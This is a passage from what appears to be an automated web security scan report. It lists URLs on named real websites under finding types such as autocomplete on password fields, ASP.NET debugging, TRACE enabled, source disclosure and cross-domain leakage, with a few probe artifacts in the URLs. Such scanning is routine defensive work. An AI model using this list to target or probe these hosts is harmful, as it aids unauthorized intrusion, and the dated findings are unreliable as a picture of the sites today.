18.20. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

18.21. http://support.expedia.com/ci/ajaxRequest/getReportData

18.22. https://support.trust-guard.com/visitor/index.php

18.23. http://t2.trackalyzer.com/trackalyze.asp

18.24. http://t3.trackalyzer.com/trackalyze.asp

18.25. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp

18.26. http://visible.me/search/social/follow/2563692

18.27. http://www.advancedaccess.com/swf/swfobject.js

18.28. http://www.advisorsquare.com/advdev/calculators/content.asp

18.29. http://www.advisorsquare.com/design_gallery/Flash/BB12_bg.gif

18.30. http://www.advisorsquare.com/design_gallery/Flash/BU13Flash_banner_background.gif

18.31. http://www.advisorsquare.com/design_gallery/Flash/BU14Flash_banner_background.gif

18.32. http://www.advisorsquare.com/design_gallery/Flash/BUP18Flash_banner_background.gif

18.33. http://www.advisorsquare.com/design_gallery/Flash/CS15Flash_banner_background.gif

18.34. http://www.advisorsquare.com/design_gallery/Flash/CS18_bg.gif

18.35. http://www.advisorsquare.com/design_gallery/Flash/CS20_bg.gif

18.36. http://www.advisorsquare.com/design_gallery/Flash/GA14_bg.gif

18.37. http://www.advisorsquare.com/design_gallery/Flash/GA15_bg.gif

18.38. http://www.advisorsquare.com/design_gallery/Flash/NL12_bg.gif

18.39. http://www.advisorsquare.com/design_gallery/fsplash/background.gif

18.40. http://www.advisorsquare.com/design_gallery/limited/SE3_background.gif

18.41. http://www.advisorsquare.com/design_gallery/welcome/grayStripe.gif

18.42. http://www.advisorsquare.com/design_gallery/welcome/transpx.gif

18.43. http://www.advisorsquare.com/images/business.gif

18.44. http://www.advisorsquare.com/images/business_over.gif

18.45. http://www.advisorsquare.com/images/individual.gif

18.46. http://www.advisorsquare.com/images/individual_over.gif

18.47. http://www.advisorsquare.com/images/view1.gif

18.48. http://www.advisorsquare.com/images/view_over1.gif

18.49. http://www.advisorsquare.com/new/BrochureLevel/transPx.gif

18.50. http://www.advisorsquare.com/new/BusinessLevel/FA09BannerBG.jpg

18.51. http://www.advisorsquare.com/new/BusinessLevel/grayStripe.gif

18.52. http://www.advisorsquare.com/new/BusinessLevel/transPx.gif

18.53. http://www.advisorsquare.com/new/asframeless02/content.asp

18.54. http://www.advisorsquare.com/new/asle04/content.asp

18.55. http://www.advisorsquare.com/new/asle04/grayStripe.gif

18.56. http://www.advisorsquare.com/new/asle04/staff_pict1.jpg

18.57. http://www.advisorsquare.com/new/asle04/staff_pict2.jpg

18.58. http://www.advisorsquare.com/new/asle05/content.asp

18.59. http://www.advisorsquare.com/new/asle05/transPx.gif

18.60. http://www.advisorsquare.com/new/css/menu.css

18.61. http://www.advisorsquare.com/new/images/banner_slogan1.jpg

18.62. http://www.advisorsquare.com/new/images/content_bg_repeat.jpg

18.63. http://www.advisorsquare.com/new/js/jquery-1.4.4.min.js.txt

18.64. http://www.advisorsquare.com/new/js/menu.js.txt

18.65. http://www.advisorsquare.com/new/js/preload.js.txt

18.66. http://www.advisorsquare.com/research/content.asp

18.67. http://www.advisorsquare.com/useradmin/Authenticate.asp

18.68. http://www.advisorsquare.com/websites1/PR/images/dotclear.gif

18.69. http://www.advisorsquare.com/websites1/Web/img/dotclear.gif

18.70. http://www.brownrudnick.com/nr/alertsArchv.asp

18.71. http://www.brownrudnick.com/nr/alertsArchv.asp

18.72. http://www.brownrudnick.com/nr/articlesindv.asp

18.73. http://www.btamericascareers.com/

18.74. http://www.clone-systems.com/ecommerce/

18.75. http://www.clone-systems.com/ecommerce/index.php

18.76. http://www.clone-systems.com/resell-clone-guard.html

18.77. http://www.clone-systems.com/stylesheet.php

18.78. https://www.clone-systems.com/ecommerce/index.php

18.79. https://www.clone-systems.com/stylesheet.php

18.80. http://www.cloneguard.com/pci-scanning.asp

18.81. http://www.compliancepoint.com/sub_serv_isc_pci.asp

18.82. http://www.dominionenterprises.com/main/do/Advertiser_Agreement

18.83. http://www.dominionenterprises.com/main/do/Careers

18.84. http://www.eneighborhoods.com/

18.85. http://www.expedia.com/Hotels

18.86. http://www.expediainc.com/

18.87. http://www.ezflexplan.com/lbmc/

18.88. http://www.ezflexplan.com/navigation/menu.asp

18.89. http://www.gofileroom.com/SessionRelease.asp

18.90. http://www.gofileroom.com/lbmc/

18.91. http://www.gotoassist.com/ph/lbmc

18.92. http://www.hunton.com/news/uniGC.aspx

18.93. http://www.hunton.com/professionals/uniGC.aspx

18.94. http://www.hunton.com/services/uniGC.aspx

18.95. http://www.lbmc.com/about_us

18.96. http://www.lbmctech.com/

18.97. http://www.linkedin.com/pub/12/7a2/294

18.98. http://www.linkedin.com/pub/social-follow/12/7a2/294

18.99. http://www.neospire.net/security-and-compliance/PCI-DSS.php

18.100. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp

18.101. http://www.nextadvisor.com/favicon.ico

18.102. http://www.socialfollow.com/

18.103. http://www.socialfollow.com/blog/

18.104. http://www.socialfollow.com/login.php

18.105. https://www.taxnotebook.com/Login/PopupMessage.aspx

18.106. https://www.taxnotebook.com/Login/TNLogin.aspx

18.107. https://www.taxnotebook.com/tnstart.asp

18.108. http://www.trpcweb.com/

18.109. http://www.trust-guard.com/compare-Trust-Seals-s/1.htm

18.110. http://www.visitor-track.com/admin/loghit.asp

18.111. http://ad.yieldmanager.com/pixel

18.112. http://ads.adonion.com/serving/tracking_id.php

18.113. http://ads.allatsea.net/www/delivery/lg.php

18.114. http://ads.allatsea.net/www/delivery/spc.php

18.115. http://adsfac.us/ag.asp

18.116. http://ak1.abmr.net/is/media.expedia.com

18.117. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

18.118. http://api.twitter.com/1/statuses/user_timeline.json

18.119. http://as.casalemedia.com/j

18.120. http://b.scorecardresearch.com/b

18.121. http://b.scorecardresearch.com/r

18.122. http://bh.contextweb.com/bh/set.aspx

18.123. http://cf.addthis.com/red/p.json

18.124. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

18.125. http://dce.sapha.com/logging.php

18.126. http://dce.sapha.com/logging.php

18.127. http://expedia.com/

18.128. http://image.providesupport.com/js/advancedaccess/safe-monitor.js

18.129. http://image.providesupport.com/js/charlesw/safe-standard.js

18.130. http://int.teracent.net/tase/int

18.131. http://leadback.advertising.com/adcedge/lb

18.132. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

18.133. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

18.134. http://media.fastclick.net/w/tre

18.135. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

18.136. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

18.137. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

18.138. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

18.139. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

18.140. http://pixel.quantserve.com/pixel

18.141. http://pts.eyewonder.com/ewr

18.142. http://pub.kroogy.com/www/delivery/ajs.php

18.143. http://pub.kroogy.com/www/delivery/lg.php

18.144. http://sales.liveperson.net/hc/56727252/

18.145. http://segment-pixel.invitemedia.com/pixel

18.146. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551

18.147. http://serw.clicksor.com/newServing/tracking_id.php

18.148. http://stats.kroogy.com/cnt-gif1x1.php

18.149. http://sync.mathtag.com/sync/img

18.150. http://tags.bluekai.com/site/2576

18.151. http://tags.bluekai.com/site/2751

18.152. http://tags.bluekai.com/site/2753

18.153. http://tags.bluekai.com/site/2948

18.154. http://track.websiteceo.com/m/

18.155. http://va.px.invitemedia.com/pixel

18.156. http://www.bizographics.com/collect/

18.157. http://www.dhmiservices.com/ClickContact/js.ashx

18.158. http://www.dhmiservices.com/ImageHandler.ashx

18.159. http://www.dhmiservices.com/favicon.ico

18.160. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/

18.161. http://www.eneighborhoods.com/common/s_code.js

18.162. http://www.eneighborhoods.com/css/basic.css

18.163. http://www.eneighborhoods.com/favicon.ico

18.164. http://www.eneighborhoods.com/images/about_contact_us_menu_over.jpg

18.165. http://www.eneighborhoods.com/images/about_contact_us_menu_up.jpg

18.166. http://www.eneighborhoods.com/images/agent_services_menu_over.jpg

18.167. http://www.eneighborhoods.com/images/agent_services_menu_up.jpg

18.168. http://www.eneighborhoods.com/images/bullet.gif

18.169. http://www.eneighborhoods.com/images/cmls.gif

18.170. http://www.eneighborhoods.com/images/dominion.gif

18.171. http://www.eneighborhoods.com/images/en_logo.gif

18.172. http://www.eneighborhoods.com/images/en_logo_white.jpg

18.173. http://www.eneighborhoods.com/images/enterprise_solutions_menu_over.jpg

18.174. http://www.eneighborhoods.com/images/enterprise_solutions_menu_up.jpg

18.175. http://www.eneighborhoods.com/images/footer_menu_bg.jpg

18.176. http://www.eneighborhoods.com/images/free_resources_menu_over.jpg

18.177. http://www.eneighborhoods.com/images/free_resources_menu_up.jpg

18.178. http://www.eneighborhoods.com/images/getstarted_button.gif

18.179. http://www.eneighborhoods.com/images/header_bckgd.jpg

18.180. http://www.eneighborhoods.com/images/home_image.jpg

18.181. http://www.eneighborhoods.com/images/homes_logo.jpg

18.182. http://www.eneighborhoods.com/images/menu_bg_new.jpg

18.183. http://www.eneighborhoods.com/images/spacer.gif

18.184. http://www.eneighborhoods.com/images/support_training_menus_over.jpg

18.185. http://www.eneighborhoods.com/images/support_training_menus_up.jpg

18.186. http://www.eneighborhoods.com/images/webinar_link.jpg

18.187. http://www.eneighborhoods.com/login_form.asp

18.188. http://www.eneighborhoods.com/main.css

18.189. http://www.eneighborhoods.com/menu/homepage/menu.css

18.190. http://www.eneighborhoods.com/menu/menu.css

18.191. http://www.eneighborhoods.com/menu/mm_css_menu.js

18.192. http://www.eneighborhoods.com/menumachine/core/w3cdom.js

18.193. http://www.eneighborhoods.com/menumachine/eneighborhoodsfooter2/menuspecs.js

18.194. http://www.eneighborhoods.com/menumachine/eneighborhoodshomemenu2/menuspecs.js

18.195. http://www.eneighborhoods.com/menumachine/menumachine2.js

18.196. http://www.expedia.com/default.asp

18.197. http://www.expedia.com/pub/agent.dll

18.198. https://www.expedia.com/pub/agent.dll

18.199. http://www.gofileroom.com/includes/css/main.css

18.200. http://www.gofileroom.com/includes/js/GFRAJAX.js

18.201. http://www.gofileroom.com/includes/js/login.js

18.202. http://www.gofileroom.com/includes/js/loginfunctions.js

18.203. http://www.gofileroom.com/lbmc/css/DocAudit.css

18.204. http://www.gofileroom.com/lbmc/images/LBMC%20horizontal%20blue.jpg

18.205. http://www.gofileroom.com/lbmc/images/angle3a.gif

18.206. http://www.gofileroom.com/lbmc/images/angle3b.gif

18.207. http://www.gofileroom.com/lbmc/images/button2A.gif

18.208. http://www.gofileroom.com/lbmc/images/check.gif

18.209. http://www.gofileroom.com/lbmc/images/dottedlinevert2.gif

18.210. http://www.gofileroom.com/lbmc/images/s-key.gif

18.211. http://www.gofileroom.com/lbmc/images/softwareInstalled.gif

18.212. http://www.gofileroom.com/lbmc/images/spacer.gif

18.213. http://www.gofileroom.com/lbmc/images/version.gif

18.214. https://www.gofileroom.com/lbmc

18.215. http://www.googleadservices.com/pagead/aclk

18.216. http://www.googleadservices.com/pagead/conversion/1065139613/

18.217. http://www.googleadservices.com/pagead/conversion/1070200079/

18.218. http://www.harrisconnect.com/

18.219. http://www.hunton.com/

18.220. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif

18.221. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif

18.222. http://www.hunton.com/FCWSite/Include/autocomplete.css

18.223. http://www.hunton.com/FCWSite/Include/footer.css

18.224. http://www.hunton.com/FCWSite/Include/footer_web.css

18.225. http://www.hunton.com/FCWSite/Include/general_web.css

18.226. http://www.hunton.com/FCWSite/Include/header.css

18.227. http://www.hunton.com/FCWSite/Include/header_web.css

18.228. http://www.hunton.com/FCWSite/Include/menu.js

18.229. http://www.hunton.com/FCWSite/Include/packetbuilder.css

18.230. http://www.hunton.com/FCWSite/Include/pdf.css

18.231. http://www.hunton.com/FCWSite/Include/print.css

18.232. http://www.hunton.com/FCWSite/Include/spamproof.aspx

18.233. http://www.hunton.com/FCWSite/Include/spamproof.js

18.234. http://www.hunton.com/FCWSite/img/Hunton/arrow_green_onblackbg.gif

18.235. http://www.hunton.com/FCWSite/img/Hunton/bullet.gif

18.236. http://www.hunton.com/FCWSite/img/Hunton/home_tile.gif

18.237. http://www.hunton.com/FCWSite/img/Hunton/middle/arrow_indicator.png

18.238. http://www.hunton.com/FCWSite/img/Hunton/middle/body_wide.png

18.239. http://www.hunton.com/FCWSite/img/Hunton/middle/bottom_wide.png

18.240. http://www.hunton.com/FCWSite/img/Hunton/middle/top_wide.png

18.241. http://www.hunton.com/_xpressHighlights/highlights_image.aspx

18.242. http://www.hunton.com/aboutus/uniGC.aspx

18.243. http://www.hunton.com/ajaxBCard.aspx

18.244. http://www.hunton.com/alan_kailer/

18.245. http://www.hunton.com/contactus/

18.246. http://www.hunton.com/dallas-united-states-of-america/

18.247. http://www.hunton.com/disclaimer/uniGC.aspx

18.248. http://www.hunton.com/emailthispage/emdisclaimer.aspx

18.249. http://www.hunton.com/files/ImageControl/3ae71a66-38dd-46b3-b631-5a5623944fc2/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_share.gif

18.250. http://www.hunton.com/files/ImageControl/56db1668-7f9d-4143-ab08-061242989a1f/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News-and-Events.jpg

18.251. http://www.hunton.com/files/ImageControl/843a0930-99dd-4266-9d90-55e4d3cb4a74/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_rss.png

18.252. http://www.hunton.com/files/ImageControl/ae2e582d-08db-47f0-9896-42087325427a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo_print.gif

18.253. http://www.hunton.com/files/ImageControl/c50db0f0-85f0-4d2a-801e-5c7b6ca5855a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_email.gif

18.254. http://www.hunton.com/files/ImageControl/db4a4e6b-0e0c-4e10-ad7f-3f8a91fd6ef1/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo.gif

18.255. http://www.hunton.com/files/ImageControl/de90a91d-23b9-4df4-84f3-06e0d99ae915/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News_Events.jpg

18.256. http://www.hunton.com/files/Publication/b1c22611-ccc5-4c3b-aa62-a5f4667f2a5f/Presentation/PublicationAttachment/b83cdb36-b286-49eb-852d-ab18526b1335/martinez_edit9.mp4

18.257. http://www.hunton.com/include_common/NetInsight/ntpagetag.gif

18.258. http://www.hunton.com/include_common/NetInsight/ntpagetag.js

18.259. http://www.hunton.com/include_common/jQuery/dimensions.js

18.260. http://www.hunton.com/include_common/jQuery/html5media.min.js

18.261. http://www.hunton.com/include_common/jQuery/html5mediaConfig.js

18.262. http://www.hunton.com/include_common/jQuery/html5mediaOverlay.js

18.263. http://www.hunton.com/include_common/jQuery/jqDnR.js

18.264. http://www.hunton.com/include_common/jQuery/jquery.ajaxQueue.1.3.js

18.265. http://www.hunton.com/include_common/jQuery/jquery.autocomplete.min.js

18.266. http://www.hunton.com/include_common/jQuery/jquery.bgiframe.min.js

18.267. http://www.hunton.com/include_common/jQuery/jquery.min.js

18.268. http://www.hunton.com/include_common/jQuery/jquery.tools.1.2.5.min.js

18.269. http://www.hunton.com/include_common/jQuery/packetbuilder.js

18.270. http://www.hunton.com/include_common/jQuery/packetviewer.js

18.271. http://www.hunton.com/include_common/jQuery/ui.core.min.js

18.272. http://www.hunton.com/include_common/jQuery/ui.draggable.min.js

18.273. http://www.hunton.com/include_common/jQuery/ui.droppable.min.js

18.274. http://www.hunton.com/load.vcf

18.275. http://www.hunton.com/private_wealth_advisors/

18.276. http://www.hunton.com/sitemap/uniGC.aspx

18.277. http://www.millersweld.com/

18.278. http://www.millerwelds.com/financing/index.php

18.279. http://www.myroitracking.com/newServing/tracking_id.php

18.280. http://www.networksolutions.com/css/gzip_1067997057/css/legal.css

18.281. http://www.networksolutions.com/css/gzip_1721580421/css/print.css

18.282. http://www.networksolutions.com/css/gzip_1778421796/bundles/template.css

18.283. http://www.networksolutions.com/css/gzip_N1611004770/bundles/ns0.css

18.284. http://www.networksolutions.com/js/gzip_117311061/js/utils/LivePerson-mtagconfig.js

18.285. http://www.networksolutions.com/js/gzip_1540985833/bundles/template.js

18.286. http://www.networksolutions.com/js/gzip_N1866293226/bundles/omniture.js

18.287. https://www.paypal.com/en_US/i/btn/btn_xpressCheckout.gif

19. Password field with autocomplete enabled

19.1. http://hmficweb.hinghammutual.com/

19.2. http://hmficweb.hinghammutual.com/default.aspx

19.3. http://hmficweb.hinghammutual.com/reglogin.aspx

19.4. http://hmficweb.hinghammutual.com/reglogin.aspx

19.5. http://hmficweb.hinghammutual.com/reglogin.aspx

19.6. http://login.vindicosuite.com/

19.7. http://login.vindicosuite.com/default.asp

19.8. https://mosaicsecurity.com/products/1919-pci-scan-annual

19.9. https://secure.trust-guard.com/

19.10. https://secure.trust-guard.com/index.php

19.11. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp

19.12. http://www.advisorsquare.com/useradmin/Authenticate.asp

19.13. http://www.alumniconnections.com/alumni_members/mylisting/index.html

19.14. https://www.clone-systems.com/ecommerce/checkout.php

19.15. https://www.clone-systems.com/ecommerce/checkout.php

19.16. http://www.eneighborhoods.com/login_form.asp

19.17. https://www.expedia.com/pub/agent.dll

19.18. https://www.expedia.com/pub/agent.dll

19.19. http://www.facebook.com/SocialFollow

19.20. http://www.gofileroom.com/lbmc/

19.21. https://www.gofileroom.com/lbmc/Default.asp

19.22. http://www.lbmc.com/user

19.23. http://www.linkedin.com/pub/social-follow/12/7a2/294

19.24. http://www.resiteonline.com/

19.25. http://www.socialfollow.com/

19.26. http://www.socialfollow.com/

19.27. http://www.socialfollow.com/blog/

19.28. http://www.socialfollow.com/login.php

19.29. http://www.socialfollow.com/login.php

19.30. https://www.taxnotebook.com/Login/ChangePwd.aspx

19.31. https://www.trpc401k.com/

20. Source code disclosure

20.1. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

20.2. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

20.3. http://www.secureworks.com/lib/js/state4.js

21. ASP.NET debugging enabled

21.1. http://4qinvite.4q.iperceptions.com/Default.aspx

21.2. http://www.dhmiservices.com/Default.aspx

21.3. http://www.leadlife.com/Default.aspx

21.4. http://www.sutherlandglobal.com/Default.aspx

21.5. http://www.visitor-track.com/Default.aspx

22. Referer-dependent response

22.1. http://depot.activalive.com/app/deployment.php

22.2. http://www.expedia.com/daily/service/default.asp

22.3. http://www.facebook.com/plugins/activity.php

22.4. http://www.facebook.com/plugins/like.php

23. Cross-domain POST

23.1. https://events.gsmiweb.com/subscribe.php

23.2. http://hmficweb.hinghammutual.com/

23.3. http://hmficweb.hinghammutual.com/default.aspx

23.4. http://www.resiteonline.com/

23.5. http://www.resiteonline.com/

23.6. http://www.sapha.com/

23.7. http://www.secureworks.com/compliance/comp/pci.html

23.8. http://www.secureworks.com/compliance/comp/pci.html

24. Cross-domain Referer leakage

24.1. http://ad.doubleclick.net/adj/scmag.hmktus/sc

24.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc

24.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

24.4. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

24.5. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

24.6. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

24.7. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

24.8. http://allatsea.net/directclassifieds.php

24.9. http://apps.sapha.com/appshandler.php

24.10. http://as.casalemedia.com/j

24.11. http://b.rad.msn.com/ADSAdClient31.dll

24.12. http://dinclinx.com/

24.13. http://dinclinx.com/

24.14. https://events.gsmiweb.com/subscribe.php

24.15. http://fls.doubleclick.net/activityi

24.16. http://fls.doubleclick.net/activityi

24.17. http://fls.doubleclick.net/activityi

24.18. http://fls.doubleclick.net/activityi

24.19. http://googleads.g.doubleclick.net/pagead/ads

24.20. http://googleads.g.doubleclick.net/pagead/ads

24.21. http://googleads.g.doubleclick.net/pagead/ads

24.22. http://googleads.g.doubleclick.net/pagead/ads

24.23. http://googleads.g.doubleclick.net/pagead/ads

24.24. http://googleads.g.doubleclick.net/pagead/ads

24.25. http://googleads.g.doubleclick.net/pagead/ads

24.26. http://googleads.g.doubleclick.net/pagead/ads

24.27. http://googleads.g.doubleclick.net/pagead/ads

24.28. http://googleads.g.doubleclick.net/pagead/ads

24.29. http://googleads.g.doubleclick.net/pagead/ads

24.30. http://googleads.g.doubleclick.net/pagead/ads

24.31. http://googleads.g.doubleclick.net/pagead/ads

24.32. http://googleads.g.doubleclick.net/pagead/ads

24.33. http://googleads.g.doubleclick.net/pagead/ads

24.34. http://googleads.g.doubleclick.net/pagead/ads

24.35. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js

24.36. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js

24.37. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr

24.38. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr

24.39. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

24.40. http://rad.msn.com/ADSAdClient31.dll

24.41. http://recruiting.scout.com/Legacy/a.z

24.42. http://scmagazineus.disqus.com/combination_widget.js

24.43. https://subscribe.haymarketmedia.com/scm/

24.44. http://tags.bluekai.com/site/2576

24.45. http://tags.bluekai.com/site/2576

24.46. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp

24.47. http://tours.sapha.com/

24.48. https://verify.authorize.net/anetseal/

24.49. http://www.advisorsquare.com/new/asframeless02/content.asp

24.50. http://www.brownrudnick.com/nr/alertsArchv.asp

24.51. http://www.brownrudnick.com/nr/articlesindv.asp

24.52. http://www.caribbean-ocean.com/accommodation2.php

24.53. http://www.clone-systems.com/ecommerce/cart.php

24.54. http://www.clone-systems.com/ecommerce/javascript/product.js

24.55. https://www.clone-systems.com/ecommerce/login.php

24.56. http://www.compliancepoint.com/sub_serv_isc_pci.asp

24.57. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/

24.58. http://www.expedia.com/daily/hotels/unpublishedrates/default.asp

24.59. http://www.expedia.com/pub/agent.dll

24.60. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

24.61. https://www.expedia.com/pub/agent.dll

24.62. http://www.facebook.com/plugins/activity.php

24.63. http://www.facebook.com/plugins/like.php

24.64. http://www.facebook.com/plugins/like.php

24.65. http://www.facebook.com/plugins/likebox.php

24.66. http://www.firehost.com/secure-hosting/pci

24.67. http://www.firstmateonline.com/businessinfo.php

24.68. http://www.google.com/search

24.69. http://www.google.com/search

24.70. http://www.hunton.com/aboutus/uniGC.aspx

24.71. http://www.hunton.com/disclaimer/uniGC.aspx

24.72. http://www.hunton.com/news/uniGC.aspx

24.73. http://www.hunton.com/professionals/uniGC.aspx

24.74. http://www.hunton.com/services/uniGC.aspx

24.75. http://www.hunton.com/sitemap/uniGC.aspx

24.76. http://www.ilumennetwork.com/CPA/

24.77. http://www.lbmc.com/sites/all/modules/extlink/extlink.js

24.78. https://www.mavitunasecurity.com/welcome/

24.79. http://www.millersweld.com/landing.php

24.80. http://www.millersweld.com/top.php

24.81. http://www.neospire.net/security-and-compliance/PCI-DSS.php

24.82. http://www.nutter.com/attorneys.php

24.83. http://www.nutter.com/careers.php

24.84. http://www.scmagazineus.com/js/scripts.js

24.85. http://www.scout.com/2/a.z

24.86. http://www.scout.com/a.z

24.87. http://www.secureworks.com/compliance/comp/pci.html

24.88. http://www.socialfollow.com/button/image/

25. Cross-domain script include

25.1. http://allatsea.net/

25.2. http://allatsea.net/by-category/Cruising

25.3. http://allatsea.net/by-category/Deep_Sea_Fishing

25.4. http://allatsea.net/by-category/Sailing_Regatta

25.5. http://allatsea.net/classifieds.php

25.6. http://allatsea.net/directclassifieds.php

25.7. http://allatsea.net/subscribe.htm

25.8. https://events.gsmiweb.com/subscribe.php

25.9. http://fls.doubleclick.net/activityi

25.10. http://googleads.g.doubleclick.net/pagead/ads

25.11. http://googleads.g.doubleclick.net/pagead/ads

25.12. http://images.video.msn.com/js/ch/channels.js

25.13. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS

25.14. http://nba.scout.com/

25.15. http://recruiting.scout.com/Legacy/a.z

25.16. http://scouthoops.scout.com/

25.17. https://subscribe.haymarketmedia.com/scm/

25.18. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp

25.19. http://www.advancedaccess.com/

25.20. http://www.advancedaccess.com/swf/swfobject.js

25.21. http://www.agentadvantage.com/

25.22. http://www.caribbean-ocean.com/

25.23. http://www.caribbean-ocean.com/accommodation2.php

25.24. http://www.caribbean-ocean.com/index.php

25.25. http://www.caribbean-ocean.com/index.php/1'

25.26. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91

25.27. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105

25.28. http://www.clone-systems.com/ecommerce/

25.29. http://www.clone-systems.com/ecommerce/cart.php

25.30. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

25.31. http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html

25.32. https://www.clone-systems.com/ecommerce/checkout.php

25.33. https://www.clone-systems.com/ecommerce/login.php

25.34. http://www.compliancepoint.com/sub_serv_isc_pci.asp

25.35. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/

25.36. http://www.eneighborhoods.com/

25.37. http://www.expedia.com/default.asp

25.38. http://www.facebook.com/SocialFollow

25.39. http://www.facebook.com/plugins/activity.php

25.40. http://www.facebook.com/plugins/like.php

25.41. http://www.facebook.com/plugins/likebox.php

25.42. http://www.firehost.com/secure-hosting/pci

25.43. http://www.firstmateonline.com/businessinfo.php

25.44. http://www.gotoassist.com/en_US/pageNotFound.tmpl

25.45. http://www.hunton.com/

25.46. http://www.hunton.com/aboutus/uniGC.aspx

25.47. http://www.hunton.com/alan_kailer/

25.48. http://www.hunton.com/contactus/

25.49. http://www.hunton.com/dallas-united-states-of-america/

25.50. http://www.hunton.com/disclaimer/uniGC.aspx

25.51. http://www.hunton.com/news/uniGC.aspx

25.52. http://www.hunton.com/private_wealth_advisors/

25.53. http://www.hunton.com/professionals/uniGC.aspx

25.54. http://www.hunton.com/services/uniGC.aspx

25.55. http://www.hunton.com/sitemap/uniGC.aspx

25.56. http://www.lbmctech.com/

25.57. http://www.lbmctech.com/favicon.ico

25.58. http://www.millerwelds.com/financing/images/powerline_bg.png

25.59. http://www.millerwelds.com/financing/index.php

25.60. http://www.neospire.net/security-and-compliance/PCI-DSS.php

25.61. http://www.nextadvisor.com/favicon.ico

25.62. http://www.scmagazineus.com/

25.63. http://www.scmagazineus.com/subscribe/section/122/

25.64. http://www.scout.com/

25.65. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z

25.66. http://www.scout.com/2/a.z

25.67. http://www.scout.com/Legacy/a.z

25.68. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z

25.69. http://www.scout.com/a.z

25.70. http://www.scout.com/search.aspx

25.71. http://www.secureworks.com/compliance/comp/pci.html

25.72. http://www.socialfollow.com/blog/

25.73. https://www.trpc401k.com/

26. TRACE method is enabled

26.1. http://797-pwy-691.mktoresp.com/

26.2. http://ads.adonion.com/

26.3. http://ads.allatsea.net/

26.4. http://ads.clicksor.com/

26.5. http://allatsea.net/

26.6. http://apps.sapha.com/

26.7. http://bh.contextweb.com/

26.8. http://d.xp1.ru4.com/

26.9. http://dce.sapha.com/

26.10. http://depot.activalive.com/

26.11. http://haymarketbusinesspublications.122.2o7.net/

26.12. http://lbmc.imonitor.net/

26.13. http://learn.bridgefront.com/

26.14. https://seal.networksolutions.com/

26.15. http://secure-us.imrworldwide.com/

26.16. http://serw.clicksor.com/

26.17. http://sniff.visistat.com/

26.18. http://t3.trackalyzer.com/

26.19. http://tags.bluekai.com/

26.20. http://tours.sapha.com/

26.21. http://track.websiteceo.com/

26.22. http://widgets.digg.com/

26.23. http://www.angege.com/

26.24. http://www.brownrudnick.com/

26.25. http://www.caribbean-ocean.com/

26.26. http://www.compliancepoint.com/

26.27. http://www.dynamicperimeter.com/

26.28. http://www.lbmctech.com/

26.29. http://www.myroitracking.com/

26.30. http://www.nextadvisor.com/

26.31. http://www.nutter.com/

26.32. http://www.sapha.com/

26.33. http://www.skichalets.co.uk/

27. Email addresses disclosed

27.1. http://ads1.msn.com/library/dap.js

27.2. http://allatsea.net/directclassifieds.php

27.3. http://allatsea.net/subscribe.htm

27.4. https://broker.gotoassist.com/favicon.ico

27.5. https://events.gsmiweb.com/subscribe.php

27.6. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js

27.7. http://hmficweb.hinghammutual.com/

27.8. http://hmficweb.hinghammutual.com/abouthingham/

27.9. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx

